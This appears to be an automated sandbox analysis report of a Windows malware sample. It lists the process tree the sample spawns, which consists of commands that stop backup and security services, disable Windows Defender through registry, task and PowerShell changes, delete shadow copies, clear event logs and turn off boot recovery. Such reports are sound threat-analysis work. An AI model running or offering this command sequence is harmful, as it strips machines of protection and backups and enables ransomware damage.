edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe sc.exe PID 964 wrote to memory of 1056 964 edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe sc.exe PID 964 wrote to memory of 1056 964 edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe sc.exe PID 964 wrote to memory of 1056 964 edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe sc.exe PID 964 wrote to memory of 1216 964 edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe sc.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe"C:\Users\Admin\AppData\Local\Temp\edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe"1⤵
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:964 -
C:\Windows\system32\net.exenet.exe stop "NetMsmqActivator" /y2⤵
- Suspicious use of WriteProcessMemory
PID:1884 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "NetMsmqActivator" /y3⤵PID:460
-
C:\Windows\system32\net.exenet.exe stop "SamSs" /y2⤵
- Suspicious use of WriteProcessMemory
PID:1312 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SamSs" /y3⤵PID:1256
-
C:\Windows\system32\net.exenet.exe stop "SDRSVC" /y2⤵
- Suspicious use of WriteProcessMemory
PID:1832 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SDRSVC" /y3⤵PID:1348
-
C:\Windows\system32\net.exenet.exe stop "SstpSvc" /y2⤵
- Suspicious use of WriteProcessMemory
PID:1272 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SstpSvc" /y3⤵PID:1820
-
C:\Windows\system32\net.exenet.exe stop "UI0Detect" /y2⤵
- Suspicious use of WriteProcessMemory
PID:864 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "UI0Detect" /y3⤵PID:1976
-
C:\Windows\system32\net.exenet.exe stop "VSS" /y2⤵
- Suspicious use of WriteProcessMemory
PID:1972 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "VSS" /y3⤵PID:1960
-
C:\Windows\system32\net.exenet.exe stop "wbengine" /y2⤵
- Suspicious use of WriteProcessMemory
PID:1356 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "wbengine" /y3⤵PID:1552
-
C:\Windows\system32\net.exenet.exe stop "WebClient" /y2⤵
- Suspicious use of WriteProcessMemory
PID:1616 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "WebClient" /y3⤵PID:744
-
C:\Windows\system32\sc.exesc.exe config "NetMsmqActivator" start= disabled2⤵PID:1640
-
C:\Windows\system32\sc.exesc.exe config "SamSs" start= disabled2⤵PID:968
-
C:\Windows\system32\sc.exesc.exe config "SDRSVC" start= disabled2⤵PID:1472
-
C:\Windows\system32\sc.exesc.exe config "SstpSvc" start= disabled2⤵PID:1736
-
C:\Windows\system32\sc.exesc.exe config "UI0Detect" start= disabled2⤵PID:1056
-
C:\Windows\system32\sc.exesc.exe config "VSS" start= disabled2⤵PID:1216
-
C:\Windows\system32\sc.exesc.exe config "wbengine" start= disabled2⤵PID:1672
-
C:\Windows\system32\sc.exesc.exe config "WebClient" start= disabled2⤵PID:904
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:1704
-
C:\Windows\system32\reg.exereg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f2⤵PID:1596
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f2⤵PID:1644
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f2⤵PID:460
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f2⤵PID:1320
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f2⤵PID:1688
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f2⤵PID:1132
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f2⤵PID:392
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f2⤵PID:432
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f2⤵PID:1944
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f2⤵PID:1488
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f2⤵PID:2040
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f2⤵PID:1164
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f2⤵PID:1724
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f2⤵PID:760
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f2⤵PID:816
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable2⤵PID:1328
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable2⤵PID:1904
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable2⤵PID:1404
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable2⤵PID:664
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable2⤵PID:1676
-
C:\Windows\system32\reg.exereg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f2⤵PID:1140
-
C:\Windows\system32\reg.exereg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f2⤵PID:1976
-
C:\Windows\system32\reg.exereg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f2⤵PID:1032
-
C:\Windows\system32\reg.exereg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f2⤵PID:1636
-
C:\Windows\system32\reg.exereg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f2⤵PID:1612
-
C:\Windows\system32\reg.exereg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f2⤵PID:1580
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:568
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:1768
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:1712
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:1604
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f2⤵
- Modifies security service
PID:516 -
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:1812
-
C:\Windows\system32\vssadmin.exevssadmin.exe delete shadows /all /quiet2⤵
- Interacts with shadow copies
PID:1960 -
C:\Windows\system32\wevtutil.exewevtutil.exe cl system2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1480 -
C:\Windows\system32\wevtutil.exewevtutil.exe cl security2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1908 -
C:\Windows\system32\wevtutil.exewevtutil.exe cl application2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1408 -
C:\Windows\System32\Wbem\wmic.exewmic.exe SHADOWCOPY /nointeractive2⤵
- Suspicious use of AdjustPrivilegeToken
PID:276 -
C:\Windows\System32\Wbem\wmic.exewmic.exe shadowcopy delete2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1660 -
C:\Windows\system32\bcdedit.exebcdedit.exe /set {default} bootstatuspolicy ignoreallfailures2⤵
- Modifies boot configuration data using bcdedit
PID:556 -
C:\Windows\system32\bcdedit.exebcdedit.exe /set {default} recoveryenabled no2⤵
- Modifies boot configuration data using bcdedit
PID:616 -
C:\Windows\system32\cmd.execmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All2⤵PID:996
-
C:\Program Files\Windows Defender\MpCmdRun.exe"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All3⤵
- Deletes Windows Defender Definitions
PID:1656 -
C:\Windows\system32\cmd.execmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true2⤵PID:852
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableIOAVProtection $true3⤵
- Suspicious behavior: EnumeratesProcesses
PID:1840 -
C:\Windows\system32\cmd.execmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true2⤵PID:2076
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableRealtimeMonitoring $true3⤵
- Suspicious behavior: EnumeratesProcesses
PID:2096
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
MD51b9d07fbbb8d5c47ecb6b0a710d962d7
SHA1b890276d079e5c11cbbdc7059d49be19d05a62de
SHA25615c61e4b39e64d2726daf765d11fdbcfa708c84f657e526d54281f370fd441bb
SHA51223a55aa7bc512ee4a7ec8e3f575e3f0826f75141e9a9502e20cc7832ba4011d820c593b451bb468cb4c3652d61d37f414b640b7c5fb2dfe037c92922a02e41ac